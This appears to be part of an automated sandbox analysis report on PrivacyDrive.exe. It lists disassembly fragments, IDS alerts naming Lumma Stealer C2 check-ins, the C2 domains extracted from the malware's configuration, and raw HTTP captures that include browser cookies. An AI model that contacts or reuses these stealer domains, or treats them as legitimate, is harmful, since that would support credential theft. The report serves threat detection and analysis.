Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_059FF8FA
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h 16_2_059FF8FA
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 16_2_059F2813
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 16_2_059F2813
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh 16_2_05A03870
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov word ptr [eax], cx 16_2_059E6B80
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-54h] 16_2_059E0BAC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+00000744h] 16_2_059F2BC9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [edi], al 16_2_059F2BC9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 16_2_059F2BC9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_059EDB75
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+10h] 16_2_059CDAB0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, 0000000Bh 16_2_059F3AB3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp byte ptr [edi], 00000000h 16_2_059D5ADF
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-54h] 16_2_059E0A01
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx ebp, word ptr [edi] 16_2_059FEA30

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2056078 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop) : 192.168.2.16:53987 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.16:49829 -> 172.67.206.221:443
Source: Network traffic Suricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.16:49830 -> 172.67.206.221:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.16:49830 -> 172.67.206.221:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.16:49830 -> 172.67.206.221:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.16:49829 -> 172.67.206.221:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.16:49829 -> 172.67.206.221:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: covvercilverow.shop
Source: Malware configuration extractor URLs: priooozekw.shop
Source: Malware configuration extractor URLs: pumpkinkwquo.shop
Source: Malware configuration extractor URLs: surroundeocw.shop
Source: Malware configuration extractor URLs: deallyharvenw.shop
Source: Malware configuration extractor URLs: abortinoiwiam.shop
Source: Malware configuration extractor URLs: racedsuitreow.shop
Source: Malware configuration extractor URLs: candleduseiwo.shop
Source: Malware configuration extractor URLs: defenddsouneuw.shop
Detected non-DNS traffic on DNS port
Source: global traffic TCP traffic: 192.168.2.16:59822 -> 1.1.1.1:53
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.32.68
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /xjs/_/ss/k=xjs.hd.3K9kqFG9IbE.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAAAUADsJAABGAAAbABAAAAAAAAIAgAEAAAAAACABAAAAAmABAAAAAAACABAJAACgCAAAAIBACBAAgAAKIAQoQAIEiiAUAgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACAACAIwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAAAEgAAAMgAEyAAEAAAAAAABkAAAAAAAAAAAAAAAAAAAAAAAAAACAACAAoAAAAAAAAAAAAAAAAAAAAAAC/d=1/ed=1/br=1/rs=ACT90oEAN8vKHPrZc1uQQW97laV6I-0P2A/m=cdos,hsm,jsa,mb4ZUb,d,csi,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic HTTP traffic detected: GET /logos/2024/popcorn/rc4/cta.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=1/ed=1/dg=3/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/ee=ALeJib:B8gLwd;AfeaP:TkrAjf;BMxAGc:E5bFse;BgS6mb:fidj5d;BjwMce:cXX2Wb;CxXAWb:YyRLvc;DULqB:RKfG5c;Dkk6ge:JZmW9e;DpcR3d:zL72xf;EABSZ:MXZt9d;ESrPQc:mNTJvc;EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;EnlcNd:WeHg4;F9mqte:UoRcbe;Fmv9Nc:O1Tzwc;G0KhTb:LIaoZ;G6wU6e:hezEbd;GleZL:J1A7Od;HMDDWe:G8QUdb;HoYVKb:PkDN7e;HqeXPd:cmbnH;IBADCc:RYquRb;IoGlCf:b5lhvb;IsdWVc:qzxzOb;JXS8fb:Qj0suc;JbMT3:M25sS;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;KOxcK:OZqGte;KQzWid:ZMKkN;KcokUb:KiuZBf;KpRAue:Tia57b;LBgRLc:SdcwHb,XVMNvd;LEikZe:byfTOb,lsjVmc;LXA8b:q7OdKd;LsNahb:ucGLNb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Np8Qkd:Dpx6qc;Nyt6ic:jn2sGd;OgagBe:cNTe0;OohIYe:mpEAQb;Pjplud:EEDORb,PoEs9b;Q1Ow7b:x5CSu;Q6C5kf:pfdZCe;QGR0gd:Mlhmy;R2kc8b:ALJqWb;R4IIIb:QWfeKf;R9Ulx:CR7Ufe;RDNBlf:zPRCJb;SLtqO:Kh1xYe;SMDL4c:fTfGO,fTfGO;SNUn3:ZwDk9d,x8cHvb;ScI3Yc:e7Hzgb,e7Hzgb;ShpF6e:N0pvGc;SzQQ3e:dNhofb;TxfV6d:YORN0b;U96pRd:FsR04;UBKJZ:LGDJGb;UDrY1c:eps46d;UVmjEd:EesRsb;UyG7Kb:wQd0G;V2HTTe:RolTY;VGRfx:VFqbr;VN6jIc:ddQyuf;VOcgDe:YquhTb;VsAqSb:PGf2Re;VxQ32b:k0XsBb;WCEKNd:I46Hvd;WDGyFe:jcVOxd;Wfmdue:g3MJlb;XUezZ:sa7lqb;YIZmRd:A1yn5d;YV5bee:IvPZ6d;YkQtAf:rx8ur;ZMvdv:PHFPjb;ZSH6tc:QAvyLe;ZWEUA:afR4Cf;a56pNe:JEfCwb;aAJE9c:WHW6Ef;aCJ9tf:qKftvc;aZ61od:arTwJ;af0EJf:ghinId;bDXwRe:UsyOtc;bcPXSc:gSZLJb;cEt90b:ws9Tlc;cFTWae:gT8qnd;coJ8e:KvoW8;dIoSBb:ZgGg9b;dLlj2:Qqt3Gf;daB6be:lMxGPd;dowIGb:ebZ3mb,ebZ3mb;dtl0hd:lLQWFe;eBAeSb:Ck63tb;eBZ5Nd:audvde;eHDfl:ofjVkb;eO3lse:nFClrf;euOXY:OZjbQ;g8nkx:U4MzKc;gaub4:TN6bMe;gtVSi:ekUOYd;h3MYod:cEt90b;hK67qb:QWEO5b;heHB1:sFczq;hjRo6e:F62sG;hsLsYc:Vl118;iFQyKf:QIhFr,vfuNJf;imqimf:jKGL2e;jY0zg:Q6tNgc;k2Qxcb:XY51pe;kCQyJ:ueyPK;kMFpHd:OTA3Ae;kbAm9d:MkHyGd;lOO0Vd:OTA3Ae;lkq0A:JyBE3e;nAFL3:NTMZac,s39S4;nJw4Gd:dPFZH;oGtAuc:sOXFj;oSUNyd:fTfGO,fTfGO;oUlnpc:RagDlc;okUaUd:wItadb;pKJiXd:VCenhc;pNsl2d:j9Yuyc;pXdRYb:JKoKVe;pj82le:mg5CW;qZx2Fc:j0xrE;qaS3gd:yiLg6e;qafBPd:sgY6Zb;qavrXe:zQzcXe;qddgKe:d7YSfd,x4FYXe;rQSrae:C6D5Fc;sTsDMc:kHVSUb;sZmdvc:rdGEfc;tH4IIe:Ymry6;tosKvd:ZCqP3;trZL0b:qY8PFe;uuQkY:u2V3ud;vGrMZ:lPJJ0c;vfVwPd:lcrkwe;w3bZCb:ZPGaIb;w4rSdf:XKiZ9;w9w86d:dt4g2b;wQlYve:aLUfP;wR5FRb:O1Gjze,TtcOte;wV5Pjc:L8KGxe;whEZac:F4AmNb;xBbsrc:NEW1Qc;ysNiMc:CpIBjd;yxTchf:KUM7Z;z97YGf:oug9te;zOsCQe:Ko78Df;zaIgPb:Qtpxbd/m=cdos,hsm,jsa,mb4ZUb,d,csi,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua
Source: global traffic HTTP traffic detected: GET /images/searchbox/desktop_searchbox_sprites318_hr.webp HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic HTTP traffic detected: GET /logos/doodles/2024/popcorn/rc4/popcorn.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic HTTP traffic detected: GET /logos/2024/popcorn/rc4/cta.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic HTTP traffic detected: GET /images/searchbox/desktop_searchbox_sprites318_hr.webp HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=1/ed=1/dg=3/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/ee=ALeJib:B8gLwd;AfeaP:TkrAjf;BMxAGc:E5bFse;BgS6mb:fidj5d;BjwMce:cXX2Wb;CxXAWb:YyRLvc;DULqB:RKfG5c;Dkk6ge:JZmW9e;DpcR3d:zL72xf;EABSZ:MXZt9d;ESrPQc:mNTJvc;EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;EnlcNd:WeHg4;F9mqte:UoRcbe;Fmv9Nc:O1Tzwc;G0KhTb:LIaoZ;G6wU6e:hezEbd;GleZL:J1A7Od;HMDDWe:G8QUdb;HoYVKb:PkDN7e;HqeXPd:cmbnH;IBADCc:RYquRb;IoGlCf:b5lhvb;IsdWVc:qzxzOb;JXS8fb:Qj0suc;JbMT3:M25sS;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;KOxcK:OZqGte;KQzWid:ZMKkN;KcokUb:KiuZBf;KpRAue:Tia57b;LBgRLc:SdcwHb,XVMNvd;LEikZe:byfTOb,lsjVmc;LXA8b:q7OdKd;LsNahb:ucGLNb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Np8Qkd:Dpx6qc;Nyt6ic:jn2sGd;OgagBe:cNTe0;OohIYe:mpEAQb;Pjplud:EEDORb,PoEs9b;Q1Ow7b:x5CSu;Q6C5kf:pfdZCe;QGR0gd:Mlhmy;R2kc8b:ALJqWb;R4IIIb:QWfeKf;R9Ulx:CR7Ufe;RDNBlf:zPRCJb;SLtqO:Kh1xYe;SMDL4c:fTfGO,fTfGO;SNUn3:ZwDk9d,x8cHvb;ScI3Yc:e7Hzgb,e7Hzgb;ShpF6e:N0pvGc;SzQQ3e:dNhofb;TxfV6d:YORN0b;U96pRd:FsR04;UBKJZ:LGDJGb;UDrY1c:eps46d;UVmjEd:EesRsb;UyG7Kb:wQd0G;V2HTTe:RolTY;VGRfx:VFqbr;VN6jIc:ddQyuf;VOcgDe:YquhTb;VsAqSb:PGf2Re;VxQ32b:k0XsBb;WCEKNd:I46Hvd;WDGyFe:jcVOxd;Wfmdue:g3MJlb;XUezZ:sa7lqb;YIZmRd:A1yn5d;YV5bee:IvPZ6d;YkQtAf:rx8ur;ZMvdv:PHFPjb;ZSH6tc:QAvyLe;ZWEUA:afR4Cf;a56pNe:JEfCwb;aAJE9c:WHW6Ef;aCJ9tf:qKftvc;aZ61od:arTwJ;af0EJf:ghinId;bDXwRe:UsyOtc;bcPXSc:gSZLJb;cEt90b:ws9Tlc;cFTWae:gT8qnd;coJ8e:KvoW8;dIoSBb:ZgGg9b;dLlj2:Qqt3Gf;daB6be:lMxGPd;dowIGb:ebZ3mb,ebZ3mb;dtl0hd:lLQWFe;eBAeSb:Ck63tb;eBZ5Nd:audvde;eHDfl:ofjVkb;eO3lse:nFClrf;euOXY:OZjbQ;g8nkx:U4MzKc;gaub4:TN6bMe;gtVSi:ekUOYd;h3MYod:cEt90b;hK67qb:QWEO5b;heHB1:sFczq;hjRo6e:F62sG;hsLsYc:Vl118;iFQyKf:QIhFr,vfuNJf;imqimf:jKGL2e;jY0zg:Q6tNgc;k2Qxcb:XY51pe;kCQyJ:ueyPK;kMFpHd:OTA3Ae;kbAm9d:MkHyGd;lOO0Vd:OTA3Ae;lkq0A:JyBE3e;nAFL3:NTMZac,s39S4;nJw4Gd:dPFZH;oGtAuc:sOXFj;oSUNyd:fTfGO,fTfGO;oUlnpc:RagDlc;okUaUd:wItadb;pKJiXd:VCenhc;pNsl2d:j9Yuyc;pXdRYb:JKoKVe;pj82le:mg5CW;qZx2Fc:j0xrE;qaS3gd:yiLg6e;qafBPd:sgY6Zb;qavrXe:zQzcXe;qddgKe:d7YSfd,x4FYXe;rQSrae:C6D5Fc;sTsDMc:kHVSUb;sZmdvc:rdGEfc;tH4IIe:Ymry6